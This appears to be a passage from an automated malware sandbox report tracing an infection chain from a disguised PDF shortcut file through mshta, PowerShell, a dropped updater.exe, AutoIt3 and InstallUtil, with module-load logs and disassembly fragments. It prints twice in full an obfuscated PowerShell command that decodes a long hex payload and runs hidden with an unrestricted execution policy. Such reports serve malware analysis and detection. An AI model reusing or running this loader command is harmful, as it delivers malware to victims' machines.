                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: version.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: wsock32.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: version.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: winmm.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: mpr.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: wininet.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: iphlpapi.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: userenv.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: uxtheme.dll
                    Source: C:\ahdccea\AutoIt3.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: Agreement for Cooperation.PDF.lnk.download.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000B.00000003.2230085986.0000000004A94000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000003.2229933261.0000000004BB7000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000B.00000002.2235652956.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000002.2358128445.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2349255697.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000000E.00000003.2348209254.0000000004E67000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2433215959.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2428081410.0000000004634000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2427935882.0000000004757000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004DC6D9 LoadLibraryA,GetProcAddress,11_2_004DC6D9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D82325 push eax; iretd 4_2_00007FF848D8233D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F7888 push ebx; retf 7_2_00007FF8476F792A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F820A push E960BFADh; ret 7_2_00007FF8476F8209
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F81F8 push E960BFADh; ret 7_2_00007FF8476F8209
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F7557 push ebx; iretd 7_2_00007FF8476F756A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8476F792B push ebx; retf 7_2_00007FF8476F792A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00488B75 push ecx; ret 11_2_00488B88
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0047CBF1 push eax; retf 11_2_0047CBF8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134712D push 01347159h; ret 11_2_01347151
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0134712B push 01347159h; ret 11_2_01347151
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D199 push 0133D20Fh; ret 11_2_0133D207
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133F011 push ecx; mov dword ptr [esp], ecx11_2_0133F016
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01337051 push 013370C0h; ret 11_2_013370B8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133704F push 013370C0h; ret 11_2_013370B8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013470B5 push 013470E1h; ret 11_2_013470D9
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013470ED push 01347119h; ret 11_2_01347111
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_013370D1 push 013370FDh; ret 11_2_013370F5
